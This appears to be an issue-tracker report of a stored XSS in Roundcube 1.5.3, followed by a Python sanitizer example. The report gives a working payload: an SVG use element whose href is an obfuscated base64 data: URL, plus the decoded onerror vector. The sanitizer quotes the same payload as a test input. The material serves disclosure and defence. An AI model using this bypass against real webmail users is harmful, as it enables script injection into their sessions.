Closed
Description
Hello dear developers!
The next sample shows me an XSS. Would be pleased if you could check it on the latest Roundcube version.
Reproduce:
- Send html to your mailbox with following content
<svg><use href="dAta:image/s vg+xml;base64,PHN2ZyBpZD0ieDIiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+IDxpbWFnZSBocmVmPSJ4IiBvbmVycm9yPSJhbGVydCgyMzQpIiAvPjwvc3ZnPg==#x2">
This is the string, encoded to base64, that you see above:
<svg id="x2" xmlns="http://www.w3.org/2000/svg"> <image href="x" onerror="alert(234)" /></svg>
- Ensure the browser alerts with "234"
Env
RoundCube version: 1.5.3
Browsers: Google Chrome (Version 117.0.5938.62), Mozilla Firefox (117.0.1 (64-bit))
Thanks!
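The defensive point in this report is that the `href` of an SVG `<use>` element is a URL the sanitizer must police like any other, and that a plain substring match on `data:` is not enough, because the browser still resolves the mixed-case and whitespace-padded variant shown above. The following is an added example, not Roundcube's own sanitizer (washtml) and not code from the reporter: a small stand-alone HTML filter that normalizes each URL-bearing attribute the way a browser does (strip ASCII whitespace and control characters, lowercase the scheme) and keeps it only if the scheme is on an allowlist. The sample mail body is the payload quoted in the report; the benign body, the attribute set `URL_ATTRS` and the scheme allowlist are this example's assumptions.

```python
import html
import re
from html.parser import HTMLParser

# Assumed policy: attributes that can pull content into a document, and the
# only URL schemes a mail client should let through from untrusted HTML.
URL_ATTRS = {"href", "xlink:href", "src"}
ALLOWED_SCHEMES = {"http", "https", "mailto", "cid"}
_SCHEME_RE = re.compile(r"^([a-z][a-z0-9+.\-]*):")


def normalize_url(value: str) -> str:
    """Drop ASCII whitespace and C0 controls before looking at the scheme,
    mirroring what a browser does, so 'dAta:image/s vg+xml' and
    'data:image/svg+xml' are judged the same way."""
    return re.sub(r"[\x00-\x20\x7f]", "", value)


def url_scheme(value: str):
    """Lowercased scheme of a URL, or None for relative and fragment URLs."""
    m = _SCHEME_RE.match(normalize_url(value).lower())
    return m.group(1) if m else None


def is_safe_url(value: str) -> bool:
    """Allowlist check: relative URLs and allowlisted schemes pass, everything
    else (data:, javascript:, vbscript:, ...) is rejected by default."""
    scheme = url_scheme(value)
    return scheme is None or scheme in ALLOWED_SCHEMES


class UrlAttrSanitizer(HTMLParser):
    """Re-emits the HTML, dropping URL attributes whose scheme is not allowed.
    Each dropped attribute is recorded in self.findings for logging."""

    def __init__(self):
        # convert_charrefs=False so entities are re-emitted as written instead
        # of being decoded into raw markup on output.
        super().__init__(convert_charrefs=False)
        self.out = []
        self.findings = []

    def _filter(self, tag, attrs):
        kept = []
        for name, value in attrs:
            if name.lower() in URL_ATTRS and value is not None and not is_safe_url(value):
                self.findings.append((tag, name, url_scheme(value)))
                continue
            kept.append((name, value))
        return kept

    def _fmt(self, tag, attrs, selfclosing=False):
        parts = [tag]
        for name, value in attrs:
            parts.append(name if value is None else f'{name}="{html.escape(value, quote=True)}"')
        return "<" + " ".join(parts) + (" />" if selfclosing else ">")

    def handle_starttag(self, tag, attrs):
        self.out.append(self._fmt(tag, self._filter(tag, attrs)))

    def handle_startendtag(self, tag, attrs):
        self.out.append(self._fmt(tag, self._filter(tag, attrs), True))

    def handle_endtag(self, tag):
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(data)

    def handle_entityref(self, name):
        self.out.append(f"&{name};")

    def handle_charref(self, name):
        self.out.append(f"&#{name};")


def sanitize(html_text: str):
    """Return (sanitized_html, findings) for an untrusted HTML mail body."""
    p = UrlAttrSanitizer()
    p.feed(html_text)
    p.close()
    return "".join(p.out), p.findings


# Sample mail body copied from the report above.
REPORTED_BODY = (
    '<svg><use href="dAta:image/s vg+xml;base64,PHN2ZyBpZD0ieDIiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+'
    'IDxpbWFnZSBocmVmPSJ4IiBvbmVycm9yPSJhbGVydCgyMzQpIiAvPjwvc3ZnPg==#x2">'
)
# Constructed benign body: an ordinary link and an in-document <use> reference.
BENIGN_BODY = (
    '<p>See <a href="https://example.org/report">the report</a>.</p>'
    '<svg><use href="#icon"/></svg>'
)

if __name__ == "__main__":
    for body in (REPORTED_BODY, BENIGN_BODY):
        out, findings = sanitize(body)
        print("findings:", findings)
        print("output:  ", out)
```

Running the block prints one finding, `('use', 'href', 'data')`, for the reported body and none for the benign one; the `<use>` element survives in both cases, but in the first its `href` is gone, so nothing is loaded. Because the decision is an allowlist on the normalized scheme rather than a search for the literal string `data:`, the case and whitespace tricks in the report do not change the outcome.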